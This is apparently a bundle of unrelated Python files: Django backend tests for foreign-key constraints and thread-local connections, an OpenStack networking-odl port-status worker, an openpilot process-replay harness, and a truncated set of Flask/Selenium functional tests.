BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify that its type is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
        # Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TransactionTestCase):
available_apps = ['backends']
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field_by_name("related_objects")[0].rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
class DBTestSettingsRenamedTests(IgnoreAllDeprecationWarningsMixin, TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
@classmethod
def setUpClass(cls):
# Silence "UserWarning: Overriding setting DATABASES can lead to
# unexpected behavior."
cls.warning_classes.append(UserWarning)
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
|
port_status_update.py
|
# Copyright (c) 2017 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib import context
from neutron_lib.plugins import directory
from neutron_lib import worker
from oslo_log import log
from neutron.db import provisioning_blocks
from networking_odl.common import client as odl_client
from networking_odl.common import odl_features
from networking_odl.common import utils
from networking_odl.common import websocket_client as odl_ws_client
LOG = log.getLogger(__name__)
class OdlPortStatusUpdate(worker.BaseWorker):
"""Class to register and handle port status update"""
PORT_PATH = "restconf/operational/neutron:neutron/ports/port"
def __init__(self):
super(OdlPortStatusUpdate, self).__init__()
self.odl_websocket_client = None
def start(self):
super(OdlPortStatusUpdate, self).start()
LOG.debug('OdlPortStatusUpdate worker running')
if odl_features.has(odl_features.OPERATIONAL_PORT_STATUS):
self.run_websocket()
def stop(self):
if self.odl_websocket_client:
self.odl_websocket_client.set_exit_flag()
def wait(self):
"""Wait for service to complete."""
@staticmethod
def reset():
pass
def run_websocket(self):
        # OpenDaylight path to receive websocket notifications on
neutron_ports_path = "/neutron:neutron/neutron:ports"
self.path_uri = utils.get_odl_url()
self.odl_websocket_client = (
odl_ws_client.OpenDaylightWebsocketClient.odl_create_websocket(
self.path_uri, neutron_ports_path,
odl_ws_client.ODL_OPERATIONAL_DATASTORE,
odl_ws_client.ODL_NOTIFICATION_SCOPE_SUBTREE,
self._process_websocket_recv,
self._process_websocket_reconnect,
True
))
def _process_websocket_recv(self, payload, reconnect):
# Callback for websocket notification
LOG.debug("Websocket notification for port status update")
for event in odl_ws_client.EventDataParser.get_item(payload):
operation, path, data = event.get_fields()
if ((operation in [event.OPERATION_UPDATE,
event.OPERATION_CREATE])):
port_id = event.extract_field(path, "neutron:uuid")
port_id = str(port_id).strip("'")
status_field = data.get('status')
if status_field is not None:
status = status_field.get('content')
LOG.debug("Update port for port id %s %s", port_id, status)
# for now we only support transition from DOWN->ACTIVE
# https://bugs.launchpad.net/networking-odl/+bug/1686023
if status == n_const.PORT_STATUS_ACTIVE:
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
if operation == event.OPERATION_DELETE:
LOG.debug("PortStatus: Ignoring delete operation")
def _process_websocket_reconnect(self, status):
if status == odl_ws_client.ODL_WEBSOCKET_CONNECTED:
# Get port data using restconf
LOG.debug("Websocket notification on reconnection")
reconn_thread = threading.Thread(
name='websocket', target=self._pull_missed_statuses)
reconn_thread.start()
def _pull_missed_statuses(self):
LOG.debug("starting to pull pending statuses...")
plugin = directory.get_plugin()
filter = {"status": [n_const.PORT_STATUS_DOWN],
"vif_type": ["unbound"]}
ports = plugin.get_ports(context.get_admin_context(), filter)
if not ports:
LOG.debug("no down ports found, done")
return
port_fetch_url = utils.get_odl_url(self.PORT_PATH)
client = odl_client.OpenDaylightRestClient.create_client(
url=port_fetch_url)
for port in ports:
port_id = port["id"]
response = client.get(port_id)
if response.status_code != 200:
LOG.warning("Non-200 response code %s", str(response))
continue
odl_status = response.json()['port'][0]['status']
if odl_status == n_const.PORT_STATUS_ACTIVE:
# for now we only support transition from DOWN->ACTIVE
# See https://bugs.launchpad.net/networking-odl/+bug/1686023
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
LOG.debug("done pulling pending statuses")
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from selfdrive.car.car_helpers import get_car
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 1.19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
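# Minimal illustrative sketch of the Event-based handshake above: receive() blocks until a
# matching send(), so the replayed process and the test driver stay in lock-step.
def _fake_socket_handshake_demo():
  sock = FakeSocket()
  received = []

  def reader():
    received.append(sock.receive())  # blocks until the main thread send()s

  t = threading.Thread(target=reader)
  t.start()
  sock.send(b"hello")  # hands the payload over and releases the reader
  t.join()
  assert received == [b"hello"]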
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
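# Each ProcessConfig below maps trigger messages (pub_sub keys) to the sockets
# the process is expected to publish in response (pub_sub values); an empty
# list means the message is only fed in, with no response expected. `ignore`
# lists fields excluded from comparison, and `tolerance` (when set) is the
# numeric tolerance used when comparing outputs.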
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan"], "radarState": ["longitudinalPlan"],
"carState": [], "controlsState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, PythonProcess):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
  assert isinstance(managed_processes[cfg.proc_name], PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s: messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs, disable=CI):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
managed_processes[cfg.proc_name].stop()
return log_msgs
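# Hedged usage sketch (not part of the original module): replay_process is
# normally driven from a test harness that loads a route log and compares the
# produced messages against a reference. The LogReader import path and the
# route file name below are assumptions for illustration only.
#
#   from tools.lib.logreader import LogReader
#   lr = LogReader("sample_route--segment/rlog.bz2")
#   cfg = next(c for c in CONFIGS if c.proc_name == "ubloxd")
#   log_msgs = replay_process(cfg, list(lr))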
|
functional_tests.py
|
import unittest
import threading
from selenium import webdriver
from app import db
from app import create_app
from app.models import LanguageTest
class FavProgLangTestCase(unittest.TestCase):
'''
Things to test:
x All the flows in wiki/app-flow-chart.svg
x Can't go to any other pages without starting from index page
Setup:
- A running testing server hosting the application
'''
index_page_url = 'http://127.0.0.1:5000/'
@classmethod
def setUpClass(cls):
cls.app = create_app('testing')
# Suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
# Start the Flask server.
threading.Thread(target=cls.app.run).start()
# cls.driver = webdriver.Chrome()
cls.driver = webdriver.Firefox()
cls.ctx = cls.app.app_context()
cls.ctx.push()
@classmethod
def tearDownClass(cls):
cls.driver.get(cls.index_page_url + 'shutdown')
cls.driver.close()
cls.ctx.pop()
def setUp(self):
if not self.driver:
self.skipTest('Webdriver not ready.')
db.create_all()
# Populate database with data.
LanguageTest.init(db)
self.driver.delete_all_cookies()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_index_page_can_go_to_question_page(self):
driver = self.driver
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
self.assertIn('/question', qlink.get_attribute('href'),
'Question page url is not in index page.')
def test_question_has_a_correct_guess_finish_game(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess? -[Yes]-> Guess Page
-> Guess Correct? -[Yes]-> Index Page
During test, we assume the _first_ record in database language test
table is:
LanguageTest('Is it interpreted?', True, 'Python')
'''
driver = self.driver
# index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose yes, we have a guess result for it.
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# guess page, we guess correctly
gyes = driver.find_element_by_css_selector('input[value="yes"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gyes, 'Guess correctness yes radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gyes.click()
gsubmit.click()
# redirect to index page
self.assertEqual(
driver.current_url, self.index_page_url,
'It should redirect to index page %s now.' % self.index_page_url)
def test_no_guess_for_question_has_more_questions_go_to_next_question(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess?
-[No]-> Has More Questions? -[Yes]-> Question Page
During test, we assume the _first two_ records in database language test
table are:
